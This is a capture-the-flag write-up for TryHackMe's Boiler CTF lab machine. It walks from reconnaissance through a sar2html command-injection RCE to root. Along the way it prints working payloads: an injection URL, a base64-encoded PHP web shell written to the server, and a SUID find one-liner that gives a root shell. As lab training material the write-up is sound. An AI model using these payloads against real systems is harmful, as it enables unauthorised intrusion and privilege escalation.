Challenge link: https://tryhackme.com/room/boilerctf2
1. Reconnaissance
First things first, we perform a port scan on the target to discover potential attack vectors:
We catch the SSH service on port 55007 thanks to scanning for all possible ports. It takes more time, it is quite loud, but in this CTF setting it is totally fine.
Besides that, we find FTP on port 21, a web server on port 80, and a web-based server management control panel Webmin on port 10000.
2. FTP and Webmin
The first thing I do when I see an FTP server is try to log in as Anonymous.
FTP
It works in this case, and listing all files in the directory shows a .info.txt file:
The content of the file look encrypted, but typical English structure is preserved which points to a simple substitution cipher:
The Caesar Cipher, perhaps? Let’s use CyberChef to try to decrypt the message. ROT13 mode reveals the following message:
1 | Just wanted to see if you find it. Lol. Remember: Enumeration is the key! |
Well, not much use of that. Let’s go to other services then.
Webmin
Since we don’t even have a username to try to connect through SSH and the web server is serving a default page, I decided to look at Webmin. Checking ExploitDB for any CVEs matching Webmin MiniServ 1.930 yields no results. I guess time to go back to the web server.
3. Web server
Not much to see here, so let us try to find anything interesting by enumerating directories with Gobuster and one of the SecLists wordlists:
1 | gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://<URL>/ |
Bingo! Joomla CMS is installed on the server. Besides it, robots.txt file exists which may contain some clues.
Robots.txt
Let’s look at the robots first:
It looks like another rabbit hole, but perhaps the numbers at the bottom that look like decimal ASCII have any meaning:
1 | 079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075 |
Using CyberChef again with the recipes From Decimal and From Base64, we discover a hash-looking string:
1 | 99b0660cd95adea327c54182baa51584 |
Indeed, CrackStation confirms that this is an MD5 hash. However, the hashed value is ‘kidding’. Another rabbit hole then.
Joomla
The website itself doesn’t reveal anything interesting. Default and simple credentials such as admin:admin do not work. This Joomla also doesn’t seem vulnerable after looking for CVEs. Nothing left but to enumerate again with Gobuster.
It took me quite a lot of time to go through multiple accessible directories, but finally, under the _test/ directory, a sar2html is revealed:
Googling for more information reveals that it is most likely vulnerable to RCE. Having read the exploit code, we can execute code by setting the plot parameter to ;<command>. For example, accessing this URL:
1 | http://<IP>/joomla/_test/?plot=;whoami |
prints the username as one of the options in the select HTML element:
This confirms the RCE vulnerability. To make it easier for me, I echoed a PHP shell to a shell.php file using the following URL (decode the plot parameter to see the executed command):
1 | http://<IP>/joomla/_test/index.php?plot=;echo%20PGh0bWw%2BDQo8Ym9keT4NCjxmb3JtIG1ldGhvZD0iR0VUIiBuYW1lPSI8P3BocCBlY2hvIGJhc2VuYW1lKCRfU0VSVkVSWydQSFBfU0VMRiddKTsgPz4iPg0KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPg0KPGlucHV0IHR5cGU9IlNVQk1JVCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9mb3JtPg0KPHByZT4NCjw%2FcGhwDQogICAgaWYoaXNzZXQoJF9HRVRbJ2NtZCddKSkNCiAgICB7DQogICAgICAgIHN5c3RlbSgkX0dFVFsnY21kJ10pOw0KICAgIH0NCj8%2BDQo8L3ByZT4NCjwvYm9keT4NCjxzY3JpcHQ%2BZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNtZCIpLmZvY3VzKCk7PC9zY3JpcHQ%2BDQo8L2h0bWw%2B%20|%20base64%20-d%20%3E%20shell.php |
and starting executing commands from there. I connected back to my machine with some help from revshells.com (using their PHP proc_open shell) and listed files in the directory. This revealed a file called log.txt with this line inside:
1 | Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$ |
Suffice to say, we get access to the victim through SSH exposed on port 55007.
4. Victim machine
Once on the victim machine logged in as basterd, their home directory contains a file called backup.sh with the following lines:
1 | USER=stoner |
Looks like we get access to yet another user. Running:
1 | su stoner |
changes the account to stoner and reveals a .secret file in their home directory. This is the user flag.
Privilege escalation
This was probably the simplest part of the challenge. Checking stoner’s SUID binaries by running:
1 | find / -perm -u=s -type f 2>/dev/null |
reveals that the find utility has this permission set. Confirming with GTFOBins, it is vulnerable and can be used to run a privileged shell by running:
1 | find . -exec /bin/sh -p \; -quit |
Bingo! The last root flag is located in the /root home directory.